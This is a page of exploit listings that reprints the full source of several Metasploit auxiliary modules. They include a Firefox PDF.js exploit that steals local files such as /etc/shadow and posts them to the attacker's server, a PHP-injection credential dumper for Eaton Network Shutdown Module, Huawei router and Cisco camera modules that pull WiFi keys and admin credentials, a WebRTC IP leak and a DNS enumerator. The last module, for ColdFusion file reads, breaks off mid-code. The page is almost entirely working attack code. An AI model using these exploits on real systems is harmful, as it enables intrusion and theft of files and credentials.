Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report def initialize(info={}) super(update_info(info, 'Name' => 'Firefox PDF.js Browser File Theft', 'Description' => %q{ This module abuses an XSS vulnerability in versions prior to Firefox 39.0.3, Firefox ESR 38.1.1, and Firefox OS 2.2 that allows arbitrary files to be stolen. The vulnerability occurs in the PDF.js component, which uses Javascript to render a PDF inside a frame with privileges to read local files. The in-the-wild malicious payloads searched for sensitive files on Windows, Linux, and OSX. Android versions are reported to be unaffected, as they do not use the Mozilla PDF viewer. }, 'Author' => [ 'Unknown', # From an 0day served on Russian news website 'fukusa', # Hacker news member that reported the issue 'Unknown' # Metasploit module ], 'License' => MSF_LICENSE, 'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]], 'PassiveActions' => [ 'WebServer' ], 'References' => [ ['URL', 'https://paste.debian.net/290146'], # 0day exploit ['URL', 'https://news.ycombinator.com/item?id=10021376'], # discussion with discoverer ['URL', 'https://blog.mozilla.org/security/2015/08/06/firefox-exploit-found-in-the-wild/'], ['CVE', '2015-4495'] ], 'DefaultAction' => 'WebServer' )) register_options([ OptString.new('FILES', [ false, 'Comma-separated list of files to steal', '/etc/passwd, /etc/shadow' ]) ]) register_advanced_options([ OptInt.new('PER_FILE_SLEEP', [ false, 'Milliseconds to wait before attempting to read the frame containing each file', 250 ]) ]) end def run print_status("File targeted for exfiltration: #{JSON.generate(file_urls)}") exploit end def on_request_uri(cli, request) if request.method.downcase == 'post' print_status('Got POST request...') process_post(cli, request) send_response_html(cli, '') else print_status('Sending exploit...') send_response_html(cli, html) end end def process_post(cli, req) name = req.qstring['name'] print_good("Received #{name}, size #{req.body.bytes.length}...") output = store_loot( name || 'data', 'text/plain', cli.peerhost, req.body, 'firefox_theft', 'Firefox PDF.js exfiltrated file' ) print_good("Stored to #{output}") end def html exploit_js = js + file_payload + '}, 20);' "<!doctype html><html><body><script>#{exploit_js}</script></body></html>" end def backend_url proto = (datastore['SSL'] ? 'https' : 'http') my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'] port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}" resource = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource "#{proto}://#{my_host}#{port_str}#{resource}/catch" end def file_payload %Q| var files = (#{JSON.generate(file_urls)}); function next() { var f = files.pop(); if (f) { get("file://"+f, function() { var data = get_data(this); var x = new XMLHttpRequest; x.open("POST", "#{backend_url}?name="+encodeURIComponent("%URL%")); x.send(data); }, #{datastore['PER_FILE_SLEEP']}, "%URL%", f); setTimeout(next, #{datastore['PER_FILE_SLEEP']}+200); } } next(); | end def file_urls datastore['FILES'].split(',').map(&:strip) end def js <<-EOJS function xml2string(obj) { return new XMLSerializer().serializeToString(obj); } function __proto(obj) { return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__; } function get(path, callback, timeout, template, value) { callback = _(callback); if (template && value) { callback = callback.replace(template, value); } js_call1 = 'javascript:' + _(function() { try { open("%url%", "_self"); } catch (e) { history.back(); } undefined; }, "%url%", path); js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined'; sandboxContext(_(function() { i = document.getElementById('i'); p = __proto(i.contentDocument.styleSheets[0].ownerNode); i2 = document.getElementById('i2'); l = p.__lookupSetter__.call(i2.contentWindow, 'location'); l.call(i2.contentWindow, window.wrappedJSObject.js_call1); })); setTimeout((function() { sandboxContext(_(function() { p = __proto(i.contentDocument.styleSheets[0].ownerNode); l = p.__lookupSetter__.call(i2.contentWindow, 'location'); l.call(i2.contentWindow, window.wrappedJSObject.js_call2); })); }), timeout); } function get_data(obj) { data = null; try { data = obj.document.documentElement.innerHTML; if (data.indexOf('dirListing') < 0) { throw new Error(); } } catch (e) { if (this.document instanceof XMLDocument) { data = xml2string(this.document); } else { try { if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') { data = this.document.body.firstChild.textContent; } else { throw new Error(); } } catch (e) { try { if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {; return null; } else { throw new Error(); } } catch (e) { ;; } } } } return data; } function _(s, template, value) { s = s.toString().split(/^\\s*function\\s+\$\\s*\$\\s*\\{/)[1]; s = s.substring(0, s.length - 1); if (template && value) { s = s.replace(template, value); } s += __proto; s += xml2string; s += get_data; s = s.replace(/\\s\\/\\/.*\\n/g, ""); s = s + ";undefined"; return s; } function get_sandbox_context() { if (window.my_win_id == null) { for (var i = 0; i < 20; i++) { try { if (window[i].location.toString().indexOf("view-source:") != -1) { my_win_id = i; break; } } catch (e) {} } }; if (window.my_win_id == null) return; clearInterval(sandbox_context_i); object.data = 'view-source:' + blobURL; window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,'; object.data = 'data:text/html,<'+'html/>'; window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+ '"position:absolute; left:-9999px;" onload = "'+_(function(){ window.wrappedJSObject.sandboxContext=(function(cmd) { with(importFunction.constructor('return this')()) { return eval(cmd); } }); }) + '"/>'); } var i = document.createElement("iframe"); i.id = "i"; i.width=i.height=0; i.style='position:absolute;left:-9999px;'; i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>"; document.documentElement.appendChild(i); i.onload = function() { if (this.contentDocument.styleSheets.length > 0) { var i2 = document.createElement("iframe"); i2.id = "i2"; i2.width=i2.height=0; i2.style='position:absolute;left:-9999px;'; i2.src = "data:application/pdf,"; document.documentElement.appendChild(i2); pdfBlob = new Blob([''], { type: 'application/pdf' }); blobURL = URL.createObjectURL(pdfBlob); object = document.createElement('object'); object.data = 'data:application/pdf,'; object.onload = (function() { sandbox_context_i = setInterval(get_sandbox_context, 200); object.onload = null; object.data = 'view-source:' + location.href; return; }); document.documentElement.appendChild(object); } else { this.contentWindow.location.reload(); } } var kill = setInterval(function() { if (window.sandboxContext) { clearInterval(kill); } else { return; } EOJS end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => 'HTTP Client LAN IP Address Gather', 'Description' => %q( This module retrieves a browser's network interface IP addresses using WebRTC. ), 'License' => MSF_LICENSE, 'Author' => [ 'Daniel Roesler', # JS Code 'Dhiraj Mishra' # MSF Module ], 'References' => [ [ 'CVE', '2018-6849' ], [ 'URL', 'http://net.ipcalf.com/' ], [ 'URL', 'https://www.inputzero.io/p/private-ip-leakage-using-webrtc.html' ] ], 'DisclosureDate' => '2013-09-05', 'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]], 'PassiveActions' => [ 'WebServer' ], 'DefaultAction' => 'WebServer' ) ) end def run exploit # start http server end def setup # code from: https://github.com/diafygi/webrtc-ips @html = <<-JS <script> //get the IP addresses associated with an account function getIPs(callback){ var ip_dups = {}; //compatibility for firefox and chrome var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection; var useWebKit = !!window.webkitRTCPeerConnection; //bypass naive webrtc blocking using an iframe if(!RTCPeerConnection){ //NOTE: you need to have an iframe in the page right above the script tag // //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe> //<script>...getIPs called in here... // var win = iframe.contentWindow; RTCPeerConnection = win.RTCPeerConnection || win.mozRTCPeerConnection || win.webkitRTCPeerConnection; useWebKit = !!win.webkitRTCPeerConnection; } //minimal requirements for data connection var mediaConstraints = { optional: [{RtpDataChannels: true}] }; var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]}; //construct a new RTCPeerConnection var pc = new RTCPeerConnection(servers, mediaConstraints); function handleCandidate(candidate){ //match just the IP address var ip_regex = /([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/ var ip_addr = ip_regex.exec(candidate)[1]; //remove duplicates if(ip_dups[ip_addr] === undefined) callback(ip_addr); ip_dups[ip_addr] = true; } //listen for candidate events pc.onicecandidate = function(ice){ //skip non-candidate events if(ice.candidate) handleCandidate(ice.candidate.candidate); }; //create a bogus data channel pc.createDataChannel(""); //create an offer sdp pc.createOffer(function(result){ //trigger the stun server request pc.setLocalDescription(result, function(){}, function(){}); }, function(){}); //wait for a while to let everything done setTimeout(function(){ //read candidate info from local description var lines = pc.localDescription.sdp.split('\\n'); lines.forEach(function(line){ if(line.indexOf('a=candidate:') === 0) handleCandidate(line); }); }, 1000); } getIPs(function(ip){ //console.log(ip); var xmlhttp = new XMLHttpRequest; xmlhttp.open('POST', window.location, true); xmlhttp.send(ip); }); </script> JS end def on_request_uri(cli, request) case request.method.downcase when 'get' print_status("#{cli.peerhost}: Sending response (#{@html.size} bytes)") send_response(cli, @html) when 'post' begin ip = request.body if ip =~ /\A([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})\z/ print_good("#{cli.peerhost}: Found IP address: #{ip}") else print_error("#{cli.peerhost}: Received malformed IP address") end rescue print_error("#{cli.peerhost}: Received malformed reply") end else print_error("#{cli.peerhost}: Unhandled method: #{request.method}") end end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Network Shutdown Module sort_values Credential Dumper', 'Description' => %q{ This module will extract user credentials from Network Shutdown Module versions 3.21 and earlier by exploiting a vulnerability found in lib/dbtools.inc, which uses unsanitized user input inside a eval() call. Please note that in order to extract credentials, the vulnerable service must have at least one USV module (an entry in the "nodes" table in mgedb.db). }, 'References' => [ ['OSVDB', '83199'], ['URL', 'https://web.archive.org/web/20121014000855/http://secunia.com/advisories/49103/'] ], 'Author' => [ 'h0ng10', 'sinn3r' ], 'License' => MSF_LICENSE, 'DisclosureDate' => '2012-06-26' )) register_options( [ Opt::RPORT(4679) ]) end def execute_php_code(code, opts = {}) param_name = Rex::Text.rand_text_alpha(6) padding = Rex::Text.rand_text_alpha(6) php_code = Rex::Text.encode_base64(code) url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f" res = send_request_cgi( { 'uri' => '/view_list.php', 'method' => 'POST', 'vars_get' => { 'paneStatusListSortBy' => url_param, }, 'vars_post' => { param_name => php_code, }, 'headers' => { 'Connection' => 'Close' } }) res end def read_credentials pattern = Rex::Text.rand_text_numeric(10) users_var = Rex::Text.rand_text_alpha(10) user_var = Rex::Text.rand_text_alpha(10) php = <<-EOT $#{users_var} = &queryDB("SELECT * FROM configUsers;"); foreach($#{users_var} as $#{user_var}) { print "#{pattern}" .$#{user_var}["login"]."#{pattern}".base64_decode($#{user_var}["pwd"])."#{pattern}"; } die(); EOT print_status("Reading user credentials from the database") response = execute_php_code(php) if not response or response.code != 200 then print_error("Failed: Error requesting page") return end credentials = response.body.to_s.scan(/\d{10}(.*)\d{10}(.*)\d{10}/) return credentials end def run credentials = read_credentials if credentials.empty? print_warning("No credentials collected.") print_warning("Sometimes this is because the server isn't in the vulnerable state.") return end cred_table = Rex::Text::Table.new( 'Header' => 'Network Shutdown Module Credentials', 'Indent' => 1, 'Columns' => ['Username', 'Password'] ) credentials.each do |record| cred_table << [record[0], record[1]] end print_line print_line(cred_table.to_s) loot_name = "eaton.nsm.credentials" loot_type = "text/csv" loot_filename = "eaton_nsm_creds.csv" loot_desc = "Eaton Network Shutdown Module Credentials" p = store_loot(loot_name, loot_type, datastore['RHOST'], cred_table.to_csv, loot_filename, loot_desc) print_good("Credentials saved in: #{p.to_s}") end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'base64' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report BASIC_INFO = { 'Device Name' => /<DeviceName>(.*)<\/DeviceName>/i, 'Serial Number' => /<SerialNumber>(.*)<\/SerialNumber>/i, 'IMEI' => /<Imei>(.*)<\/Imei>/i, 'IMSI' => /<Imsi>(.*)<\/Imsi>/i, 'ICCID' => /<Iccid>(.*)<\/Iccid>/i, 'Hardware Version' => /<HardwareVersion>(.*)<\/HardwareVersion>/i, 'Software Version' => /<SoftwareVersion>(.*)<\/SoftwareVersion>/i, 'WebUI Version' => /<WebUIVersion>(.*)<\/WebUIVersion>/i, 'Mac Address1' => /<MacAddress1>(.*)<\/MacAddress1>/i, 'Mac Address2' => /<MacAddress2>(.*)<\/MacAddress2>/i, 'Product Family' => /<ProductFamily>(.*)<\/ProductFamily>/i, 'Classification' => /<Classify>(.*)<\/Classify>/i } WAN_INFO = { 'Wan IP Address' => /<WanIPAddress>(.*)<\/WanIPAddress>/i, 'Primary Dns' => /<PrimaryDns>(.*)<\/PrimaryDns>/i, 'Secondary Dns' => /<SecondaryDns>(.*)<\/SecondaryDns>/i } DHCP_INFO ={ 'LAN IP Address' => /<DhcpIPAddress>(.*)<\/DhcpIPAddress>/i, 'DHCP StartIPAddress' => /<DhcpStartIPAddress>(.*)<\/DhcpStartIPAddress>/i, 'DHCP EndIPAddress' => /<DhcpEndIPAddress>(.*)<\/DhcpEndIPAddress>/i, 'DHCP Lease Time' => /<DhcpLeaseTime>(.*)<\/DhcpLeaseTime>/i } WIFI_INFO = { 'Wifi WPA pre-shared key' => /<WifiWpapsk>(.*)<\/WifiWpapsk>/i, 'Wifi Auth mode' => /<WifiAuthmode>(.*)<\/WifiAuthmode>/i, 'Wifi Basic encryption modes' => /<WifiBasicencryptionmodes>(.*)<\/WifiBasicencryptionmodes>/i, 'Wifi WPA Encryption Modes' => /<WifiWpaencryptionmodes>(.*)<\/WifiWpaencryptionmodes>/i, 'Wifi WEP Key1' => /<WifiWepKey1>(.*)<\/WifiWepKey1>/i, 'Wifi WEP Key2' => /<WifiWepKey2>(.*)<\/WifiWepKey2>/i, 'Wifi WEP Key3' => /<WifiWepKey3>(.*)<\/WifiWepKey3>/i, 'Wifi WEP Key4' => /<WifiWepKey4>(.*)<\/WifiWepKey4>/i, 'Wifi WEP Key Index' => /<WifiWepKeyIndex>(.*)<\/WifiWepKeyIndex>/i } def initialize(info={}) super(update_info(info, 'Name' => "Huawei Datacard Information Disclosure Vulnerability", 'Description' => %q{ This module exploits an unauthenticated information disclosure vulnerability in Huawei SOHO routers. The module will gather information by accessing the /api pages where authentication is not required, allowing configuration changes as well as information disclosure, including any stored SMS. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jimson K James', 'Tom James <tomsmaily[at]aczire.com>', # Msf module ], 'References' => [ ['CWE', '425'], ['CVE', '2013-6031'], ['US-CERT-VU', '341526'] ], 'DisclosureDate' => '2013-11-11' )) register_options( [ Opt::RHOST('mobilewifi.home') ]) end # Gather basic router information def run get_router_info print_line('') get_router_mac_filter_info print_line('') get_router_wan_info print_line('') get_router_dhcp_info print_line('') get_wifi_info end def get_wifi_info print_status("Getting WiFi Key details...") res = send_request_raw( { 'method' => 'GET', 'uri' => '/api/wlan/security-settings', }) unless is_target?(res) return end resp_body = res.body.to_s log = '' print_status("WiFi Key Details") wifi_ssid = get_router_ssid if wifi_ssid print_status("WiFi SSID: #{wifi_ssid}") log << "WiFi SSID: #{wifi_ssid}\n" end WIFI_INFO.each do |k,v| if resp_body.match(v) info = $1 print_status("#{k}: #{info}") log << "#{k}: #{info}\n" end end report_note( :host => rhost, :type => 'wifi_keys', :data => log ) end def get_router_info print_status("Gathering basic device information...") res = send_request_raw( { 'method' => 'GET', 'uri' => '/api/device/information', }) unless is_target?(res) return end resp_body = res.body.to_s print_status("Basic Information") BASIC_INFO.each do |k,v| if resp_body.match(v) info = $1 print_status("#{k}: #{info}") end end end def get_router_ssid print_status("Gathering device SSID...") res = send_request_raw( { 'method' => 'GET', 'uri' => '/api/wlan/basic-settings', }) # check whether we got any response from server and proceed. unless is_target?(res) return nil end resp_body = res.body.to_s # Grabbing the Wifi SSID if resp_body.match(/<WifiSsid>(.*)<\/WifiSsid>/i) return $1 end nil end def get_router_mac_filter_info print_status("Gathering MAC filters...") res = send_request_raw( { 'method' => 'GET', 'uri' => '/api/wlan/mac-filter', }) unless is_target?(res) return end print_status('MAC Filter Information') resp_body = res.body.to_s if resp_body.match(/<WifiMacFilterStatus>(.*)<\/WifiMacFilterStatus>/i) wifi_mac_filter_status = $1 print_status("Wifi MAC Filter Status: #{(wifi_mac_filter_status == '1') ? 'ENABLED' : 'DISABLED'}" ) end (0..9).each do |i| if resp_body.match(/<WifiMacFilterMac#{i}>(.*)<\/WifiMacFilterMac#{i}>/i) wifi_mac_filter = $1 unless wifi_mac_filter.empty? print_status("Mac: #{wifi_mac_filter}") end end end end def get_router_wan_info print_status("Gathering WAN information...") res = send_request_raw( { 'method' => 'GET', 'uri' => '/api/monitoring/status', }) unless is_target?(res) return end resp_body = res.body.to_s print_status('WAN Details') WAN_INFO.each do |k,v| if resp_body.match(v) info = $1 print_status("#{k}: #{info}") end end end def get_router_dhcp_info print_status("Gathering DHCP information...") res = send_request_raw( { 'method' => 'GET', 'uri' => '/api/dhcp/settings', }) unless is_target?(res) return end resp_body = res.body.to_s print_status('DHCP Details') # Grabbing the DhcpStatus if resp_body.match(/<DhcpStatus>(.*)<\/DhcpStatus>/i) dhcp_status = $1 print_status("DHCP: #{(dhcp_status == '1') ? 'ENABLED' : 'DISABLED'}") end unless dhcp_status && dhcp_status == '1' return end DHCP_INFO.each do |k,v| if resp_body.match(v) info = $1 print_status("#{k}: #{info}") end end end def is_target?(res) # check whether we got any response from server and proceed. unless res print_error("Failed to get any response from server") return false end # Is it a HTTP OK unless res.code == 200 print_error("Did not get HTTP 200, URL was not found") return false end # Check to verify server reported is a Huawei router unless res.headers['Server'].match(/IPWEBS\/1.4.0/i) print_error("Target doesn't seem to be a Huawei router") return false end true end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report def initialize(info = {}) super( update_info( info, { 'Name' => 'Cisco PVC2300 POE Video Camera configuration download', 'Description' => %q{ This module exploits an information disclosure vulnerability in Cisco PVC2300 cameras in order to download the configuration file containing the admin credentials for the web interface. The module first performs a basic check to see if the target is likely Cisco PVC2300. If so, the module attempts to obtain a sessionID via an HTTP GET request to the vulnerable /oamp/System.xml endpoint using hardcoded credentials. If a session ID is obtained, the module uses it in another HTTP GET request to /oamp/System.xml with the aim of downloading the configuration file. The configuration file, if obtained, is then decoded and saved to the loot directory. Finally, the module attempts to extract the admin credentials to the web interface from the decoded configuration file. No known solution was made available for this vulnerability and no CVE has been published. It is therefore likely that most (if not all) Cisco PVC2300 cameras are affected. This module was successfully tested against several Cisco PVC2300 cameras. }, 'License' => MSF_LICENSE, 'Author' => [ 'Craig Heffner', # vulnerability discovery and PoC 'Erik Wynter', # @wyntererik - Metasploit ], 'References' => [ [ 'URL', 'https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Heffner-Exploiting-Network-Surveillance-Cameras-Like-A-Hollywood-Hacker-Slides.pdf' ], # blackhat presentation - unofficial source [ 'URL', 'https://media.blackhat.com/us-13/US-13-Heffner-Exploiting-Network-Surveillance-Cameras-Like-A-Hollywood-Hacker-Slides.pdf'], # blackhat presentation - official source (not working) [ 'URL', 'https://www.youtube.com/watch?v=B8DjTcANBx0'] # full blackhat presentation ], 'DisclosureDate' => '2013-07-12', 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], # the attack can be repeated, but a timeout of several minutes may be necessary between exploit attempts 'SideEffects' => [IOC_IN_LOGS] } } ) ) end def custom_base64_alphabet 'ACEGIKMOQSUWYBDFHJLNPRTVXZacegikmoqsuwybdfhjlnprtvxz0246813579=+' end def default_base64_alphabet 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' end def request_session_id vprint_status('Attempting to obtain a session ID') # the creds used here are basically a backdoor res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'oamp', 'System.xml'), 'vars_get' => { 'action' => 'login', 'user' => 'L1_admin', 'password' => 'L1_51' } }) unless res fail_with(Failure::Unknown, 'Connection failed when trying to obtain a session ID') end unless res.code == 200 fail_with(Failure::NotVulnerable, "Received unexpected response code #{res.code} while trying to obtain a session ID.") end if res.headers.include?('sessionID') && !res.headers['sessionID'].blank? session_id = res.headers['sessionID'] print_status("The target may be vulnerable. Obtained sessionID #{session_id}") return session_id end # try to check the status message in the response body # the status may indicate if the target is perhaps only temporarily unavailable, which was encountered when testing the module repeatedly status = res.body.scan(%r{<statusString>(.*?)</statusString>})&.flatten&.first&.strip if status.blank? fail_with(Failure::NotVulnerable, 'Failed to obtain a session ID.') end if status == 'try it later' fail_with(Failure::Unknown, "Failed to obtain a session ID. The server responded with status: #{status}. The target may still be vulnerable.") else fail_with(Failure::NotVulnerable, "Failed to obtain a session ID. The server responded with status: #{status}") end end def download_config_file(session_id) vprint_status('Attempting to download the configuration file') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'oamp', 'System.xml'), 'headers' => { 'sessionID' => session_id }, 'vars_get' => { 'action' => 'downloadConfigurationFile' } }) unless res fail_with(Failure::Unknown, 'Connection failed when trying to download the configuration file') end unless res.code == 200 && !res.body.empty? fail_with(Failure::NotVulnerable, 'Failed to obtain the configuration file') end # if the exploit doesn't work, the response body should be empty. So if we have anything, we can assume we're in business res.body end def decode_config_file(config_file_encoded) # if we've made it all the way here, this shouldn't break, but better safe than sorry begin config_file_base64 = config_file_encoded.tr(custom_base64_alphabet, default_base64_alphabet) config_file_decoded = Base64.decode64(config_file_base64) rescue StandardError => e print_error('Encountered the following error when attempting to decode the configuration file:') print_error(e) fail_with(Failure::Unknown, 'Failed to decode the configuration file') end # let's just save the full config at this point path = store_loot('ciscopvc.config', 'text/plain', rhost, config_file_decoded) print_good('Successfully downloaded the configuration file') print_status("Saving the full configuration file to #{path}") # let's see if we can grab the device name from the config file if config_file_decoded =~ /comment=.*? Video Camera/ device_name = config_file_decoded.scan(/comment=(.*?)$/)&.flatten&.first&.strip unless device_name.blank? print_status("Obtained device name #{device_name}") end end # try to grab the admin username and password from the config file admin_name = nil admin_password = nil if config_file_decoded.include?('admin_name') admin_name = config_file_decoded.scan(/admin_name=(.*?)$/)&.flatten&.first&.strip end if config_file_decoded.include?('admin_password') admin_password = config_file_decoded.scan(/admin_password=(.*?)$/)&.flatten&.first&.strip end if admin_name.blank? && admin_password.blank? print_error('Failed to obtain the admin credentials from the configuration file') else print_good('Obtained the following admin credentials for the web interface from the configuration file:') print_status("admin username: #{admin_name}") print_status("admin password: #{admin_password}") # save the creds to the db report_creds(admin_name, admin_password) end end def report_creds(username, password) service_data = { address: datastore['RHOST'], port: datastore['RPORT'], service_name: 'http', protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { module_fullname: fullname, origin_type: :service, private_data: password, private_type: :password, username: username }.merge(service_data) credential_core = create_credential(credential_data) login_data = { core: credential_core, status: Metasploit::Model::Login::Status::UNTRIED }.merge(service_data) create_credential_login(login_data) end def check res1 = send_request_cgi('uri' => normalize_uri(target_uri.path)) unless res1 return Exploit::CheckCode::Unknown('Target is unreachable.') end # string togetether a few checks to make it more likely we're dealing with a Cisco camera unless res1.code == 401 && res1.headers.include?('WWW-Authenticate') && res1.headers['WWW-Authenticate'] == 'Basic realm="IP Camera"' return Exploit::CheckCode::Safe('Target is not a Cisco PVC2300 POE Video Camera') end res2 = send_request_cgi('uri' => normalize_uri(target_uri.path, 'oamp', 'System.xml')) unless res2 return Exploit::CheckCode::Unknown('Target is unreachable.') end unless res2.code == 200 && res2.body =~ %r{<ActionStatus><statusCode>.*?</statusCode><statusString>.*?</statusString></ActionStatus>} return Exploit::CheckCode::Safe('Target is not a Cisco PVC2300 POE Video Camera') end vprint_status('Target seems to be a Cisco camera') Exploit::CheckCode::Appears end def run session_id = request_session_id config_file = download_config_file(session_id) decode_config_file(config_file) end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DNS::Enumeration def initialize(info = {}) super(update_info(info, 'Name' => 'DNS Record Scanner and Enumerator', 'Description' => %q( This module can be used to gather information about a domain from a given DNS server by performing various DNS queries such as zone transfers, reverse lookups, SRV record brute forcing, and other techniques. ), 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>', 'Nixawk' ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '1999-0532'], ['OSVDB', '492'] ])) register_options( [ OptString.new('DOMAIN', [true, 'The target domain']), OptBool.new('ENUM_AXFR', [true, 'Initiate a zone transfer against each NS record', true]), OptBool.new('ENUM_BRT', [true, 'Brute force subdomains and hostnames via the supplied wordlist', false]), OptBool.new('ENUM_A', [true, 'Enumerate DNS A record', true]), OptBool.new('ENUM_CNAME', [true, 'Enumerate DNS CNAME record', true]), OptBool.new('ENUM_MX', [true, 'Enumerate DNS MX record', true]), OptBool.new('ENUM_NS', [true, 'Enumerate DNS NS record', true]), OptBool.new('ENUM_SOA', [true, 'Enumerate DNS SOA record', true]), OptBool.new('ENUM_TXT', [true, 'Enumerate DNS TXT record', true]), OptBool.new('ENUM_RVL', [ true, 'Reverse lookup a range of IP addresses', false]), OptBool.new('ENUM_TLD', [true, 'Perform a TLD expansion by replacing the TLD with the IANA TLD list', false]), OptBool.new('ENUM_SRV', [true, 'Enumerate the most common SRV records', true]), OptBool.new('STOP_WLDCRD', [true, 'Stops bruteforce enumeration if wildcard resolution is detected', false]), OptAddressRange.new('IPRANGE', [false, "The target address range or CIDR identifier"]), OptInt.new('THREADS', [false, 'Threads for ENUM_BRT', 1]), OptPath.new('WORDLIST', [false, 'Wordlist of subdomains', ::File.join(Msf::Config.data_directory, 'wordlists', 'namelist.txt')]) ]) register_advanced_options( [ OptInt.new('TIMEOUT', [false, 'DNS TIMEOUT', 8]), OptInt.new('RETRY', [false, 'Number of times to try to resolve a record if no response is received', 2]), OptInt.new('RETRY_INTERVAL', [false, 'Number of seconds to wait before doing a retry', 2]), OptBool.new('TCP_DNS', [false, 'Run queries over TCP', false]) ]) deregister_options('DnsClientUdpTimeout', 'DnsClientRetry', 'DnsClientRetryInterval', 'DnsClientTcpDns') end def run datastore['DnsClientUdpTimeout'] = datastore['TIMEOUT'] datastore['DnsClientRetry'] = datastore['RETRY'] datastore['DnsClientRetryInterval'] = datastore['RETRY_INTERVAL'] datastore['DnsClientTcpDns'] = datastore['TCP_DNS'] begin setup_resolver rescue RuntimeError => e fail_with(Failure::BadConfig, "Resolver setup failed - exception: #{e}") end domain = datastore['DOMAIN'] is_wildcard = dns_wildcard_enabled?(domain) # All exceptions should be being handled by the library # but catching here as well, just in case. begin dns_axfr(domain) if datastore['ENUM_AXFR'] rescue => e print_error("AXFR failed: #{e}") end dns_get_a(domain) if datastore['ENUM_A'] dns_get_cname(domain) if datastore['ENUM_CNAME'] dns_get_ns(domain) if datastore['ENUM_NS'] dns_get_mx(domain) if datastore['ENUM_MX'] dns_get_soa(domain) if datastore['ENUM_SOA'] dns_get_txt(domain) if datastore['ENUM_TXT'] dns_get_tld(domain) if datastore['ENUM_TLD'] dns_get_srv(domain) if datastore['ENUM_SRV'] threads = datastore['THREADS'] dns_reverse(datastore['IPRANGE'], threads) if datastore['ENUM_RVL'] return unless datastore['ENUM_BRT'] if is_wildcard dns_bruteforce(domain, datastore['WORDLIST'], threads) unless datastore['STOP_WLDCRD'] else dns_bruteforce(domain, datastore['WORDLIST'], threads) end end def save_note(target, type, records) data = { 'target' => target, 'records' => records } report_note(host: target, sname: 'dns', type: type, data: data, update: :unique_data) end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'Adobe ColdFusion Unauthenticated Arbitrary File Read', 'Description' => %q{ This module exploits a remote unauthenticated deserialization of untrusted data vulnerability in Adobe ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier, in order to read an arbitrary file from the server. To run this module you must provide a valid ColdFusion Component (CFC) endpoint via the CFC_ENDPOINT option, and a valid remote method name from that endpoint via the CFC_METHOD option. By default an endpoint in the ColdFusion Administrator (CFIDE) is provided. If the CFIDE is not accessible you will need to choose a different CFC endpoint, method and parameters. }, 'License' => MSF_LICENSE, 'Author' => [ 'sf', # MSF Module & Rapid7 Analysis ], 'References' => [ ['CVE', '2023-26360'], ['URL', 'https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis'] ], 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], 'Reliability' => [] } ) ) register_options( [ Opt::RPORT(8500), Opt::RHOST('0.0.0.0'), OptBool.new('STORE_LOOT', [false, 'Store the target file as loot', true]), OptString.new('TARGETFILE', [true, 'The target file to read, relative to the wwwroot 